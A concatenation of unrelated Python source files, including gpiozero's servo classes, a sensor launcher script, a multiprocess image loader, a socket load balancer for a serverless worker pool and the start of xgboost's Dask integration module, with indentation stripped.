"""
self.enable_device.off()
class Servo(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a PWM-controlled servo
motor connected to a GPIO pin.
Connect a power source (e.g. a battery pack or the 5V pin) to the power
cable of the servo (this is typically colored red); connect the ground
cable of the servo (typically colored black or brown) to the negative of
your battery pack, or a GND pin; connect the final cable (typically colored
white or orange) to the GPIO pin you wish to use for controlling the servo.
The following code will make the servo move between its minimum, maximum,
and mid-point positions with a pause between each::
from gpiozero import Servo
from time import sleep
servo = Servo(17)
while True:
servo.min()
sleep(1)
servo.mid()
sleep(1)
servo.max()
sleep(1)
You can also use the :attr:`value` property to move the servo to a
particular position, on a scale from -1 (min) to 1 (max) where 0 is the
mid-point::
from gpiozero import Servo
servo = Servo(17)
servo.value = 0.5
:type pin: int or str
:param pin:
The GPIO pin that the servo is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param float initial_value:
If ``0`` (the default), the device's mid-point will be set initially.
Other values between -1 and +1 can be specified as an initial position.
:data:`None` means to start the servo un-controlled (see
:attr:`value`).
:param float min_pulse_width:
The pulse width corresponding to the servo's minimum position. This
defaults to 1ms.
:param float max_pulse_width:
The pulse width corresponding to the servo's maximum position. This
defaults to 2ms.
:param float frame_width:
The length of time between servo control pulses measured in seconds.
This defaults to 20ms which is a common value for servos.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, initial_value=0.0,
min_pulse_width=1/1000, max_pulse_width=2/1000,
frame_width=20/1000, pin_factory=None):
if min_pulse_width >= max_pulse_width:
raise ValueError('min_pulse_width must be less than max_pulse_width')
if max_pulse_width >= frame_width:
raise ValueError('max_pulse_width must be less than frame_width')
self._frame_width = frame_width
self._min_dc = min_pulse_width / frame_width
self._dc_range = (max_pulse_width - min_pulse_width) / frame_width
self._min_value = -1
self._value_range = 2
super(Servo, self).__init__(
pwm_device=PWMOutputDevice(
pin, frequency=int(1 / frame_width), pin_factory=pin_factory
),
pin_factory=pin_factory
)
try:
self.value = initial_value
except:
self.close()
raise
@property
def frame_width(self):
"""
The time between control pulses, measured in seconds.
"""
return self._frame_width
@property
def min_pulse_width(self):
"""
The control pulse width corresponding to the servo's minimum position,
measured in seconds.
"""
return self._min_dc * self.frame_width
@property
def max_pulse_width(self):
"""
The control pulse width corresponding to the servo's maximum position,
measured in seconds.
"""
return (self._dc_range * self.frame_width) + self.min_pulse_width
@property
def pulse_width(self):
"""
Returns the current pulse width controlling the servo.
"""
if self.pwm_device.pin.frequency is None:
return None
else:
return self.pwm_device.pin.state * self.frame_width
def min(self):
"""
Set the servo to its minimum position.
"""
self.value = -1
def mid(self):
"""
Set the servo to its mid-point position.
"""
self.value = 0
def max(self):
"""
Set the servo to its maximum position.
"""
self.value = 1
def detach(self):
"""
Temporarily disable control of the servo. This is equivalent to
setting :attr:`value` to :data:`None`.
"""
self.value = None
def _get_value(self):
if self.pwm_device.pin.frequency is None:
return None
else:
return (
((self.pwm_device.pin.state - self._min_dc) / self._dc_range) *
self._value_range + self._min_value)
@property
def value(self):
"""
Represents the position of the servo as a value between -1 (the minimum
position) and +1 (the maximum position). This can also be the special
value :data:`None` indicating that the servo is currently
"uncontrolled", i.e. that no control signal is being sent. Typically
this means the servo's position remains unchanged, but that it can be
moved by hand.
"""
result = self._get_value()
if result is None:
return result
else:
# NOTE: This round() only exists to ensure we don't confuse people
# by returning 2.220446049250313e-16 as the default initial value
# instead of 0. The reason _get_value and _set_value are split
# out is for descendents that require the un-rounded values for
# accuracy
return round(result, 14)
@value.setter
def value(self, value):
if value is None:
self.pwm_device.pin.frequency = None
elif -1 <= value <= 1:
self.pwm_device.pin.frequency = int(1 / self.frame_width)
self.pwm_device.pin.state = (
self._min_dc + self._dc_range *
((value - self._min_value) / self._value_range)
)
else:
raise OutputDeviceBadValue(
"Servo value must be between -1 and 1, or None")
@property
def is_active(self):
return self.value is not None
class AngularServo(Servo):
"""
Extends :class:`Servo` and represents a rotational PWM-controlled servo
motor which can be set to particular angles (assuming valid minimum and
maximum angles are provided to the constructor).
Connect a power source (e.g. a battery pack or the 5V pin) to the power
cable of the servo (this is typically colored red); connect the ground
cable of the servo (typically colored black or brown) to the negative of
your battery pack, or a GND pin; connect the final cable (typically colored
white or orange) to the GPIO pin you wish to use for controlling the servo.
Next, calibrate the angles that the servo can rotate to. In an interactive
Python session, construct a :class:`Servo` instance. The servo should move
to its mid-point by default. Set the servo to its minimum value, and
measure the angle from the mid-point. Set the servo to its maximum value,
and again measure the angle::
>>> from gpiozero import Servo
>>> s = Servo(17)
>>> s.min() # measure the angle
>>> s.max() # measure the angle
You should now be able to construct an :class:`AngularServo` instance
with the correct bounds::
>>> from gpiozero import AngularServo
>>> s = AngularServo(17, min_angle=-42, max_angle=44)
>>> s.angle = 0.0
>>> s.angle
0.0
>>> s.angle = 15
>>> s.angle
15.0
.. note::
You can set *min_angle* greater than *max_angle* if you wish to reverse
the sense of the angles (e.g. ``min_angle=45, max_angle=-45``). This
can be useful with servos that rotate in the opposite direction to your
expectations of minimum and maximum.
:type pin: int or str
:param pin:
The GPIO pin that the servo is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param float initial_angle:
Sets the servo's initial angle to the specified value. The default is
0. The value specified must be between *min_angle* and *max_angle*
inclusive. :data:`None` means to start the servo un-controlled (see
:attr:`value`).
:param float min_angle:
Sets the minimum angle that the servo can rotate to. This defaults to
-90, but should be set to whatever you measure from your servo during
calibration.
:param float max_angle:
Sets the maximum angle that the servo can rotate to. This defaults to
90, but should be set to whatever you measure from your servo during
calibration.
:param float min_pulse_width:
The pulse width corresponding to the servo's minimum position. This
defaults to 1ms.
:param float max_pulse_width:
The pulse width corresponding to the servo's maximum position. This
defaults to 2ms.
:param float frame_width:
The length of time between servo control pulses measured in seconds.
This defaults to 20ms which is a common value for servos.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, initial_angle=0.0,
min_angle=-90, max_angle=90,
min_pulse_width=1/1000, max_pulse_width=2/1000,
frame_width=20/1000, pin_factory=None):
self._min_angle = min_angle
self._angular_range = max_angle - min_angle
if initial_angle is None:
initial_value = None
elif ((min_angle <= initial_angle <= max_angle) or
(max_angle <= initial_angle <= min_angle)):
initial_value = 2 * ((initial_angle - min_angle) / self._angular_range) - 1
else:
raise OutputDeviceBadValue(
"AngularServo angle must be between %s and %s, or None" %
(min_angle, max_angle))
super(AngularServo, self).__init__(
pin, initial_value, min_pulse_width, max_pulse_width, frame_width,
pin_factory=pin_factory
)
@property
def min_angle(self):
"""
The minimum angle that the servo will rotate to when :meth:`min` is
called.
"""
return self._min_angle
@property
def max_angle(self):
"""
The maximum angle that the servo will rotate to when :meth:`max` is
called.
"""
return self._min_angle + self._angular_range
@property
def angle(self):
"""
The position of the servo as an angle measured in degrees. This will
only be accurate if :attr:`min_angle` and :attr:`max_angle` have been
set appropriately in the constructor.
This can also be the special value :data:`None` indicating that the
servo is currently "uncontrolled", i.e. that no control signal is being
sent. Typically this means the servo's position remains unchanged, but
that it can be moved by hand.
"""
result = self._get_value()
if result is None:
return None
else:
# NOTE: Why round(n, 12) here instead of 14? Angle ranges can be
# much larger than -1..1 so we need a little more rounding to
# smooth off the rough corners!
return round(
self._angular_range *
((result - self._min_value) / self._value_range) +
self._min_angle, 12)
@angle.setter
def angle(self, angle):
if angle is None:
self.value = None
elif ((self.min_angle <= angle <= self.max_angle) or
(self.max_angle <= angle <= self.min_angle)):
self.value = (
self._value_range *
((angle - self._min_angle) / self._angular_range) +
self._min_value)
else:
raise OutputDeviceBadValue(
"AngularServo angle must be between %s and %s, or None" %
(self.min_angle, self.max_angle))
|
sensor.py
|
from multiprocessing import Process
# Run all python scripts at the same time
def one(): import bme280
def two(): import ccs811
def three(): import top_phat_button
def four(): import weather_bom
Process(target=one).start()
Process(target=two).start()
Process(target=three).start()
Process(target=four).start()
|
mt_loader.py
|
import logging
import numpy as np
import time
import random
from multiprocessing import Process, Queue, Value
import sys
def transform_mirror(x):
if random.random() < 0.5:
x = np.fliplr(x)
return x
def crop_image(img1, imsize):
h, w, c = img1.shape
x1 = (w - imsize[0])/2
y1 = (h - imsize[1])/2
img1_ = img1[y1:(y1+imsize[1]),x1:(x1+imsize[0]),:]
return img1_
def transform_crop_96x112(x):
return crop_image(x, (96, 112))
transforms = [ transform_crop_96x112 ]
def addTransform(self, func):
global transforms
if func not in transforms:
transforms.append(func)
def threadProc(todo, done, quit_signal):
global transforms
while quit_signal != 1:
try:
task = todo.get()
func = task[0]
param = task[1]
start = time.time()
x, y = func(param)
# do transform
for t in transforms:
x = t(x)
if quit_signal == 1:
break
done.put((x,y))
#print("done id:%d" % y)
except Exception as e:
#time.sleep(0.5)
#print(task)
print(e)
sys.exit(0)
class MultiThreadLoader:
def __init__(self, dataset, batch_size, nworkers = 1):
self.B = dataset
self.batch_size = batch_size
# todo list
self.maxsize = batch_size * 2
self.todo = Queue(self.maxsize)
# done list
self.done = Queue(self.maxsize)
# create threads
self.feed()
self.quit_signal = Value('i', 0)
self.createThread(nworkers)
def numOfClass(self):
return self.B.numOfClass()
def size(self):
return self.B.size()
def shuffle(self):
# shuffle
self.B.digest()
# prefeed
self.feed()
def createThread(self, nworkers):
self.threads = []
#self.db_lock = threading.Lock()
for i in range(nworkers):
t = Process(target=threadProc, args=(self.todo, self.done, self.quit_signal), name='worker/'+str(i))
t.start()
self.threads.append(t)
def feed(self):
if self.todo.full():
return
n = self.maxsize - self.todo.qsize()
for i in range(n):
task = self.B.nextTask()
self.todo.put(task)
#print("todo id:%d" % y)
def fetch(self):
x_list = []
y_list = []
for i in range(self.batch_size):
x, y = self.done.get()
#print("fetch id:%d" % y)
x_list.append(x)
y_list.append(y)
x_batch = np.stack(x_list, axis=0)
y_batch = np.array(y_list)
#x_batch = np.transpose(x_batch,[0,2,1,3])
return x_batch, y_batch
def getBatch(self):
start = time.time()
ret = self.fetch()
end = time.time()
self.feed()
t2 = time.time()
#print('fetch:%f feed:%f' % (end - start, t2 - end) )
return ret
def close(self):
self.quit_signal = 1
print("mtloader close")
for t in self.threads:
try:
t.terminate()
t.process.signal(signal.SIGINT)
except:
pass
for t in self.threads:
print(t.is_alive())
self.threads = []
# close datasets
self.B.close()
|
load_balancer.py
|
import logging
import random
import socket
import socketserver
import threading
from serverless.worker import Worker
logger = logging.getLogger(__name__)
class _LoadBalancerHandler(socketserver.StreamRequestHandler):
def __init__(self, workers: list[Worker], *args, **kwargs):
self.workers = workers
super().__init__(*args, **kwargs)
def handle(self) -> None:
source = self.rfile.readline().strip()
worker = random.choice(self.workers)
logger.info(
f"Forwarding source code to worker {(worker.host, worker.port)}: {source}"
)
with socket.socket() as s:
s.connect((worker.host, worker.port))
s.sendall(source + b"\n")
# make sure we get a response
s.recv(4096)
self.wfile.write(b"\n")
class LoadBalancer:
def __init__(self, host: str, port: int, workers: list[Worker], request_queue_size: int = 5):
self.host = host
self.port = port
self.workers = workers
self.server = socketserver.ThreadingTCPServer(
(host, port),
lambda *args, **kwargs: _LoadBalancerHandler(workers, *args, **kwargs),
)
self.server.request_queue_size = request_queue_size
def run(self):
logger.info(f"Starting load balancer on {(self.host, self.port)}")
for worker in self.workers:
threading.Thread(target=worker.run).start()
self.server.serve_forever()
def shutdown(self):
for worker in self.workers:
worker.shutdown()
self.server.shutdown()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
|
dask.py
|
# pylint: disable=too-many-arguments, too-many-locals, no-name-in-module
# pylint: disable=missing-class-docstring, invalid-name
# pylint: disable=too-many-lines
# pylint: disable=import-error
"""Dask extensions for distributed training. See
https://xgboost.readthedocs.io/en/latest/tutorials/dask.html for simple
tutorial. Also xgboost/demo/dask for some examples.
There are two sets of APIs in this module, one is the functional API including
``train`` and ``predict`` methods. Another is stateful Scikit-Learner wrapper
inherited from single-node Scikit-Learn interface.
The implementation is heavily influenced by dask_xgboost:
https://github.com/dask/dask-xgboost
"""
import platform
import logging
from collections import defaultdict
from collections.abc import Sequence
from threading import Thread
from typing import TYPE_CHECKING, List, Tuple, Callable, Optional, Any, Union, Dict, Set
from typing import Awaitable, Generator, TypeVar
import numpy
from . import rabit, config
from .callback import TrainingCallback
from .compat import LazyLoader
from .compat import sparse, scipy_sparse
from .compat import PANDAS_INSTALLED, DataFrame, Series, pandas_concat
from .compat import lazy_isinstance
from .core import DMatrix, DeviceQuantileDMatrix, Booster, _expect, DataIter
from .core import Objective, Metric
from .core import _deprecate_positional_args
from .training import train as worker_train
from .tracker import RabitTracker, get_host_ip
from .sklearn import XGBModel, XGBRegressorBase, XGBClassifierBase, _objective_decorator
from .sklearn import xgboost_model_doc
from .sklearn import _cls_predict_proba
if TYPE_CHECKING:
from dask import dataframe as dd
from dask import array as da
import dask
import distributed
else:
dd = LazyLoader('dd', globals(), 'dask.dataframe')
da = LazyLoader('da', globals(), 'dask.array')
dask = LazyLoader('dask', globals(), 'dask')
distributed = LazyLoader('distributed', globals(), 'dask.distributed')
_DaskCollection = Union["da.Array", "dd.DataFrame", "dd.Series"]
try:
from mypy_extensions import TypedDict
TrainReturnT = TypedDict('TrainReturnT', {
'booster': Booster,
'history': Dict,
})
except ImportError:
TrainReturnT = Dict[str, Any] # type:ignore
# Current status is considered as initial support, many features are not properly
# supported yet.
#
# TODOs:
# - CV
# - Ranking
#
# Note for developers:
#
# As of writing asyncio is still a new feature of Python and in depth documentation is
# rare. Best examples of various asyncio tricks are in dask (luckily). Classes like
# Client, Worker are awaitable. Some general rules for the implementation here:
#
# - Synchronous world is different from asynchronous one, and they don't mix well.
# - Write everything with async, then use distributed Client sync function to do the
# switch.
# - Use Any for type hint when the return value can be union of Awaitable and plain
# value. This is caused by Client.sync can return both types depending on context.
# Right now there's no good way to silent:
#
# await train(...)
#
# if train returns an Union type.
LOGGER = logging.getLogger('[xgboost.dask]')
def _start_tracker(n_workers: int) -> Dict[str, Any]:
"""Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
host = get_host_ip('auto')
rabit_context = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit_context.slave_envs())
rabit_context.start(n_workers)
thread = Thread(target=rabit_context.join)
thread.daemon = True
thread.start()
return env
def _assert_dask_support() -> None:
try:
import dask # pylint: disable=W0621,W0611
except ImportError as e:
raise ImportError(
'Dask needs to be installed in order to use this module') from e
if platform.system() == 'Windows':
msg = 'Windows is not officially supported for dask/xgboost,'
msg += ' contribution are welcomed.'
LOGGER.warning(msg)
class RabitContext:
'''A context controling rabit initialization and finalization.'''
def __init__(self, args: List[bytes]) -> None:
self.args = args
worker = distributed.get_worker()
self.args.append(
('DMLC_TASK_ID=[xgboost.dask]:' + str(worker.address)).encode())
def __enter__(self) -> None:
rabit.init(self.args)
LOGGER.debug('-------------- rabit say hello ------------------')
def __exit__(self, *args: List) -> None:
rabit.finalize()
LOGGER.debug('--------------- rabit say bye ------------------')
def concat(value: Any) -> Any: # pylint: disable=too-many-return-statements
'''To be replaced with dask builtin.'''
if isinstance(value[0], numpy.ndarray):
return numpy.concatenate(value, axis=0)
if scipy_sparse and isinstance(value[0], scipy_sparse.spmatrix):
return scipy_sparse.vstack(value, format='csr')
if sparse and isinstance(value[0], sparse.SparseArray):
return sparse.concatenate(value, axis=0)
if PANDAS_INSTALLED and isinstance(value[0], (DataFrame, Series)):
return pandas_concat(value, axis=0)
if lazy_isinstance(value[0], 'cudf.core.dataframe', 'DataFrame') or \
lazy_isinstance(value[0], 'cudf.core.series', 'Series'):
from cudf import concat as CUDF_concat # pylint: disable=import-error
return CUDF_concat(value, axis=0)
if lazy_isinstance(value[0], 'cupy.core.core', 'ndarray'):
import cupy
# pylint: disable=c-extension-no-member,no-member
d = cupy.cuda.runtime.getDevice()
for v in value:
d_v = v.device.id
assert d_v == d, 'Concatenating arrays on different devices.'
return cupy.concatenate(value, axis=0)
return dd.multi.concat(list(value), axis=0)
def _xgb_get_client(client: Optional["distributed.Client"]) -> "distributed.Client":
'''Simple wrapper around testing None.'''
if not isinstance(client, (type(distributed.get_client()), type(None))):
raise TypeError(
_expect([type(distributed.get_client()), type(None)], type(client)))
ret = distributed.get_client() if client is None else client
return ret
# From the implementation point of view, DaskDMatrix complicates a lots of
# things. A large portion of the code base is about syncing and extracting
# stuffs from DaskDMatrix. But having an independent data structure gives us a
# chance to perform some specialized optimizations, like building histogram
# index directly.
class DaskDMatrix:
# pylint: disable=missing-docstring, too-many-instance-attributes
'''DMatrix holding on references to Dask DataFrame or Dask Array. Constructing
a `DaskDMatrix` forces all lazy computation to be carried out. Wait for
the input data explicitly if you want to see actual computation of
constructing `DaskDMatrix`.
.. note::
DaskDMatrix does not repartition or move data between workers. It's
the caller's responsibility to balance the data.
.. versionadded:: 1.0.0
Parameters
----------
client :
Specify the dask client used for training. Use default client returned from dask
if it's set to None.
data :
data source of DMatrix.
label :
label used for trainin.
missing :
Value in the input data (e.g. `numpy.ndarray`) which needs to be present as a
missing value. If None, defaults to np.nan.
weight :
Weight for each instance.
base_margin :
Global bias for each instance.
label_lower_bound :
Upper bound for survival training.
label_upper_bound :
Lower bound for survival training.
feature_weights :
Weight for features used in column sampling.
feature_names :
Set names for features.
feature_types :
Set types for features
'''
def __init__(
self,
client: "distributed.Client",
data: _DaskCollection,
label: Optional[_DaskCollection] = None,
missing: float = None,
weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
label_lower_bound: Optional[_DaskCollection] = None,
label_upper_bound: Optional[_DaskCollection] = None,
feature_weights: Optional[_DaskCollection] = None,
feature_names: Optional[Union[str, List[str]]] = None,
feature_types: Optional[Union[Any, List[Any]]] = None
) -> None:
_assert_dask_support()
client = _xgb_get_client(client)
self.feature_names = feature_names
self.feature_types = feature_types
self.missing = missing
if len(data.shape) != 2:
raise ValueError(
'Expecting 2 dimensional input, got: {shape}'.format(
shape=data.shape))
if not isinstance(data, (dd.DataFrame, da.Array)):
raise TypeError(_expect((dd.DataFrame, da.Array), type(data)))
if not isinstance(label, (dd.DataFrame, da.Array, dd.Series,
type(None))):
raise TypeError(
_expect((dd.DataFrame, da.Array, dd.Series), type(label)))
self.worker_map: Dict[str, "distributed.Future"] = defaultdict(list)
self.is_quantile: bool = False
self._init = client.sync(self.map_local_data,
client, data, label=label, weights=weight,
base_margin=base_margin,
feature_weights=feature_weights,
label_lower_bound=label_lower_bound,
label_upper_bound=label_upper_bound)
def __await__(self) -> Generator:
return self._init.__await__()
async def map_local_data(
self,
client: "distributed.Client",
data: _DaskCollection,
label: Optional[_DaskCollection] = None,
weights: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
feature_weights: Optional[_DaskCollection] = None,
label_lower_bound: Optional[_DaskCollection] = None,
label_upper_bound: Optional[_DaskCollection] = None
) -> "DaskDMatrix":
'''Obtain references to local data.'''
def inconsistent(
left: List[Any], left_name: str, right: List[Any], right_name: str
) -> str:
msg = 'Partitions between {a_name} and {b_name} are not ' \
'consistent: {a_len} != {b_len}. ' \
'Please try to repartition/rechunk your data.'.format(
a_name=left_name, b_name=right_name, a_len=len(left),
b_len=len(right)
)
return msg
def check_columns(parts: Any) -> None:
# x is required to be 2 dim in __init__
assert parts.ndim == 1 or parts.shape[1], 'Data should be' \
' partitioned by row. To avoid this specify the number' \
' of columns for your dask Array explicitly. e.g.' \
' chunks=(partition_size, X.shape[1])'
data = data.persist()
for meta in [label, weights, base_margin, label_lower_bound,
label_upper_bound]:
if meta is not None:
meta = meta.persist()
# Breaking data into partitions, a trick borrowed from dask_xgboost.
# `to_delayed` downgrades high-level objects into numpy or pandas
# equivalents.
X_parts = data.to_delayed()
if isinstance(X_parts, numpy.ndarray):
check_columns(X_parts)
X_parts = X_parts.flatten().tolist()
def flatten_meta(
meta: Optional[_DaskCollection]
) -> "Optional[List[dask.delayed.Delayed]]":
if meta is not None:
meta_parts = meta.to_delayed()
if isinstance(meta_parts, numpy.ndarray):
check_columns(meta_parts)
meta_parts = meta_parts.flatten().tolist()
return meta_parts
return None
y_parts = flatten_meta(label)
w_parts = flatten_meta(weights)
margin_parts = flatten_meta(base_margin)
ll_parts = flatten_meta(label_lower_bound)
lu_parts = flatten_meta(label_upper_bound)
parts = [X_parts]
meta_names = []
def append_meta(
m_parts: Optional[List["dask.delayed.delayed"]], name: str
) -> None:
if m_parts is not None:
assert len(X_parts) == len(
m_parts), inconsistent(X_parts, 'X', m_parts, name)
parts.append(m_parts)
meta_names.append(name)
append_meta(y_parts, 'labels')
append_meta(w_parts, 'weights')
append_meta(margin_parts, 'base_margin')
append_meta(ll_parts, 'label_lower_bound')
append_meta(lu_parts, 'label_upper_bound')
# At this point, `parts` looks like:
# [(x0, x1, ..), (y0, y1, ..), ..] in delayed form
# delay the zipped result
parts = list(map(dask.delayed, zip(*parts))) # pylint: disable=no-member
# At this point, the mental model should look like:
# [(x0, y0, ..), (x1, y1, ..), ..] in delayed form
parts = client.compute(parts)
await distributed.wait(parts) # async wait for parts to be computed
for part in parts:
assert part.status == 'finished', part.status
# Preserving the partition order for prediction.
self.partition_order = {}
for i, part in enumerate(parts):
self.partition_order[part.key] = i
key_to_partition = {part.key: part for part in parts}
who_has = await client.scheduler.who_has(keys=[part.key for part in parts])
worker_map: Dict[str, "distributed.Future"] = defaultdict(list)
for key, workers in who_has.items():
worker_map[next(iter(workers))].append(key_to_partition[key])
self.worker_map = worker_map
self.meta_names = meta_names
if feature_weights is None:
self.feature_weights = None
else:
self.feature_weights = await client.compute(feature_weights).result()
return self
def create_fn_args(self, worker_addr: str) -> Dict[str, Any]:
'''Create a dictionary of objects that can be pickled for function
arguments.
'''
return {'feature_names': self.feature_names,
'feature_types': self.feature_types,
'feature_weights': self.feature_weights,
'meta_names': self.meta_names,
'missing': self.missing,
'parts': self.worker_map.get(worker_addr, None),
'is_quantile': self.is_quantile}
_DataParts = List[Tuple[Any, Optional[Any], Optional[Any], Optional[Any], Optional[Any],
Optional[Any]]]
def _get_worker_parts_ordered(
meta_names: List[str], list_of_parts: _DataParts
) -> _DataParts:
# List of partitions like: [(x3, y3, w3, m3, ..), ..], order is not preserved.
assert isinstance(list_of_parts, list)
result = []
for i, _ in enumerate(list_of_parts):
data = list_of_parts[i][0]
labels = None
weights = None
base_margin = None
label_lower_bound = None
label_upper_bound = None
# Iterate through all possible meta info, brings small overhead as in xgboost
# there are constant number of meta info available.
for j, blob in enumerate(list_of_parts[i][1:]):
if meta_names[j] == 'labels':
labels = blob
elif meta_names[j] == 'weights':
weights = blob
elif meta_names[j] == 'base_margin':
base_margin = blob
elif meta_names[j] == 'label_lower_bound':
label_lower_bound = blob
elif meta_names[j] == 'label_upper_bound':
label_upper_bound = blob
else:
raise ValueError('Unknown metainfo:', meta_names[j])
result.append((data, labels, weights, base_margin, label_lower_bound,
label_upper_bound))
return result
def _unzip(list_of_parts: _DataParts) -> List[Tuple[Any, ...]]:
return list(zip(*list_of_parts))
def _get_worker_parts(
list_of_parts: _DataParts, meta_names: List[str]
) -> List[Tuple[Any, ...]]:
partitions = _get_worker_parts_ordered(meta_names, list_of_parts)
partitions_unzipped = _unzip(partitions)
return partitions_unzipped
class DaskPartitionIter(DataIter): # pylint: disable=R0902
"""A data iterator for `DaskDeviceQuantileDMatrix`."""
def __init__(
self,
data: Tuple[Any, ...],
label: Optional[Tuple[Any, ...]] = None,
weight: Optional[Tuple[Any, ...]] = None,
base_margin: Optional[Tuple[Any, ...]] = None,
label_lower_bound: Optional[Tuple[Any, ...]] = None,
label_upper_bound: Optional[Tuple[Any, ...]] = None,
feature_names: Optional[Union[str, List[str]]] = None,
feature_types: Optional[Union[Any, List[Any]]] = None
) -> None:
self._data = data
self._labels = label
self._weights = weight
self._base_margin = base_margin
self._label_lower_bound = label_lower_bound
self._label_upper_bound = label_upper_bound
self._feature_names = feature_names
self._feature_types = feature_types
assert isinstance(self._data, Sequence)
types = (Sequence, type(None))
assert isinstance(self._labels, types)
assert isinstance(self._weights, types)
assert isinstance(self._base_margin, types)
assert isinstance(self._label_lower_bound, types)
assert isinstance(self._label_upper_bound, types)
self._iter = 0 # set iterator to 0
super().__init__()
def data(self) -> Any:
'''Utility function for obtaining current batch of data.'''
return self._data[self._iter]
def labels(self) -> Any:
'''Utility function for obtaining current batch of label.'''
if self._labels is not None:
return self._labels[self._iter]
return None
def weights(self) -> Any:
'''Utility function for obtaining current batch of label.'''
if self._weights is not None:
return self._weights[self._iter]
return None
def base_margins(self) -> Any:
'''Utility function for obtaining current batch of base_margin.'''
if self._base_margin is not None:
return self._base_margin[self._iter]
return None
def label_lower_bounds(self) -> Any:
'''Utility function for obtaining current batch of label_lower_bound.
'''
if self._label_lower_bound is not None:
return self._label_lower_bound[self._iter]
return None
def label_upper_bounds(self) -> Any:
'''Utility function for obtaining current batch of label_upper_bound.
'''
if self._label_upper_bound is not None:
return self._label_upper_bound[self._iter]
return None
def reset(self) -> None:
'''Reset the iterator'''
self._iter = 0
def next(self, input_data: Callable) -> int:
'''Yield next batch of data'''
if self._iter == len(self._data):
# Return 0 when there's no more batch.
return 0
feature_names: Optional[Union[List[str], str]] = None
if self._feature_names:
feature_names = self._feature_names
else:
if hasattr(self.data(), 'columns'):
feature_names = self.data().columns.format()
else:
feature_names = None
input_data(data=self.data(), label=self.labels(),
weight=self.weights(), group=None,
label_lower_bound=self.label_lower_bounds(),
label_upper_bound=self.label_upper_bounds(),
feature_names=feature_names,
feature_types=self._feature_types)
self._iter += 1
return 1
class DaskDeviceQuantileDMatrix(DaskDMatrix):
'''Specialized data type for `gpu_hist` tree method. This class is used to
reduce the memory usage by eliminating data copies. Internally the all
partitions/chunks of data are merged by weighted GK sketching. So the
number of partitions from dask may affect training accuracy as GK generates
bounded error for each merge.
.. versionadded:: 1.2.0
Parameters
----------
max_bin : Number of bins for histogram construction.
'''
def __init__(
self,
client: "distributed.Client",
data: _DaskCollection,
label: Optional[_DaskCollection] = None,
missing: float = None,
weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
label_lower_bound: Optional[_DaskCollection] = None,
label_upper_bound: Optional[_DaskCollection] = None,
feature_weights: Optional[_DaskCollection] = None,
feature_names: Optional[Union[str, List[str]]] = None,
feature_types: Optional[Union[Any, List[Any]]] = None,
max_bin: int = 256
) -> None:
super().__init__(client=client, data=data, label=label,
missing=missing,
weight=weight, base_margin=base_margin,
label_lower_bound=label_lower_bound,
label_upper_bound=label_upper_bound,
feature_names=feature_names,
feature_types=feature_types)
self.max_bin = max_bin
self.is_quantile = True
def create_fn_args(self, worker_addr: str) -> Dict[str, Any]:
args = super().create_fn_args(worker_addr)
args['max_bin'] = self.max_bin
return args
def _create_device_quantile_dmatrix(
feature_names: Optional[Union[str, List[str]]],
feature_types: Optional[Union[Any, List[Any]]],
feature_weights: Optional[Any],
meta_names: List[str],
missing: float,
parts: Optional[_DataParts],
max_bin: int
) -> DeviceQuantileDMatrix:
worker = distributed.get_worker()
if parts is None:
msg = 'worker {address} has an empty DMatrix. '.format(
address=worker.address)
LOGGER.warning(msg)
import cupy
d = DeviceQuantileDMatrix(cupy.zeros((0, 0)),
feature_names=feature_names,
feature_types=feature_types,
max_bin=max_bin)
return d
(data, labels, weights, base_margin,
label_lower_bound, label_upper_bound) = _get_worker_parts(
parts, meta_names)
it = DaskPartitionIter(data=data, label=labels, weight=weights,
base_margin=base_margin,
label_lower_bound=label_lower_bound,
label_upper_bound=label_upper_bound)
dmatrix = DeviceQuantileDMatrix(it,
missing=missing,
feature_names=feature_names,
feature_types=feature_types,
nthread=worker.nthreads,
max_bin=max_bin)
dmatrix.set_info(feature_weights=feature_weights)
return dmatrix
def _create_dmatrix(
feature_names: Optional[Union[str, List[str]]],
feature_types: Optional[Union[Any, List[Any]]],
feature_weights: Optional[Any],
meta_names: List[str],
missing: float,
parts: Optional[_DataParts]
) -> DMatrix:
'''Get data that local to worker from DaskDMatrix.
Returns
-------
A DMatrix object.
'''
worker = distributed.get_worker()
list_of_parts = parts
if list_of_parts is None:
msg = 'worker {address} has an empty DMatrix. '.format(address=worker.address)
LOGGER.warning(msg)
d = DMatrix(numpy.empty((0, 0)),
feature_names=feature_names,
feature_types=feature_types)
return d
T = TypeVar('T')
def concat_or_none(data: Tuple[Optional[T], ...]) -> Optional[T]:
if any([part is None for part in data]):
return None
return concat(data)
(data, labels, weights, base_margin,
label_lower_bound, label_upper_bound) = _get_worker_parts(list_of_parts, meta_names)
_labels = concat_or_none(labels)
_weights = concat_or_none(weights)
_base_margin = concat_or_none(base_margin)
_label_lower_bound = concat_or_none(label_lower_bound)
_label_upper_bound = concat_or_none(label_upper_bound)
_data = concat(data)
dmatrix = DMatrix(_data,
_labels,
missing=missing,
feature_names=feature_names,
feature_types=feature_types,
nthread=worker.nthreads)
dmatrix.set_info(base_margin=_base_margin, weight=_weights,
label_lower_bound=_label_lower_bound,
label_upper_bound=_label_upper_bound,
feature_weights=feature_weights)
return dmatrix
def _dmatrix_from_list_of_parts(
is_quantile: bool, **kwargs: Any
) -> Union[DMatrix, DeviceQuantileDMatrix]:
if is_quantile:
return _create_device_quantile_dmatrix(**kwargs)
return _create_dmatrix(**kwargs)
async def _get_rabit_args(n_workers: int, client: "distributed.Client") -> List[bytes]:
'''Get rabit context arguments from data distribution in DaskDMatrix.'''
env = await client.run_on_scheduler(_start_tracker, n_workers)
rabit_args = [('%s=%s' % item).encode() for item in env.items()]
return rabit_args
# train and predict methods are supposed to be "functional", which meets the
